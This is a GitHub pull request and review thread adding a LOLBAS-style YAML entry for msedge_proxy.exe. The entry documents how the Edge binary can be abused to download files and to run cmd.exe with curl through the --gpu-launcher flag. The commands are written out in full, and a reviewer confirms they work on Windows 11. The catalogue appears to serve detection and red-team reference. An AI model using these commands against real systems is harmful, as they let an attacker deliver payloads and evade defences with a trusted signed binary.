### PR TITLE
Create msedge_proxy.yml

### PR DESCRIPTION
**Pull request by mertdas**

### CODE REVIEW

File: yml/OSBinaries/msedge_proxy.yml [hunk 1]
```diff
@@ -0,0 +1,30 @@
...
+Created: 2023-08-18
+Commands:
+  - Command: msedge_proxy.exe http://example.com/test.zip
+    Description: msedge_proxy will download malicious file.
+    Usecase: Download file from the internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+  - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&"
```
Comment (josehelps) [inline yml/OSBinaries/msedge_proxy.yml:14]: might be worth mentioning the full path here: 

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Comment (josehelps) [inline yml/OSBinaries/msedge_proxy.yml:14]: here is a suggested updated example `"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&"`

**Review by josehelps — CHANGES_REQUESTED** [review]

**Comment by josehelps** [comment]
Successfully tested on Win 11
image

**Comment by mertdas** [comment]
> Successfully tested on Win 11 image

thank you

**Review by josehelps — APPROVED** [review]
LGTM thank you @mertdas

**Comment by mertdas** [comment]
> LGTM thank you @mertdas although CI is failing due to a missing field:
> 
> ```
>  INFO - linting yml/OSBinaries/msedge_proxy.yml
> Traceback (most recent call last):
>   File "/usr/local/bin/pykwalify", line 8, in <module>
>     sys.exit(cli_entrypoint())
>   File "/usr/local/lib/python3.9/site-packages/pykwalify/cli.py", line 98, in cli_entrypoint
>     run(parse_cli())
>   File "/usr/local/lib/python3.9/site-packages/pykwalify/cli.py", line 85, in run
>     c.validate()
>   File "/usr/local/lib/python3.9/site-packages/pykwalify/core.py", line 194, in validate
>     raise SchemaError(u"Schema validation failed:\n - {error_msg}.".format(
> pykwalify.errors.SchemaError: <SchemaError: error code 2: Schema validation failed:
>  - Cannot find required key 'Full_Path'. Path: ''.: Path: '/'>
>  ERROR - validation.invalid
>  ERROR -  --- All found errors ---
>  ERROR - ["Cannot find required key 'Full_Path'. Path: ''"]
> ```

it's finally ready :)

**Pull request merged**